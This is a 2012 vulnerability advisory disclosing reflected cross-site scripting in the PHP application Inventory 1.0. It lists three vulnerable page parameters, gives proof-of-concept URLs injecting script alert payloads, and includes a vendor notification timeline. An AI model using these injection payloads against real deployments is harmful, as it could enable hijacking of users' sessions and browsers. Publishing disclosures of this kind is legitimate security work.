SecurityvulnsSECURITYVULNS:DOC:28691Inventory 1.0 Multiple XSS Vulnerabilities
Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities
Date: 10/19/12
Author: G13
Twitter: @g13net
Software Site: https://github.com/farevalod/inventory
Version: 1.0
Category: webapp (php)
dc585
ToC
0x01 Description
0x02 XSS
0x03 Vendor Notification
0x01 Description
PHP + SQL Inventory tracking system
0x02 XSS
The Inventory application has multiple pages and parameters that are
vulnerable to cross-site scripting. This
vulnerabilities could be used to steal session cookies or take control
of a client's browser.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]
-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>
0x03 Vendor Notification
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure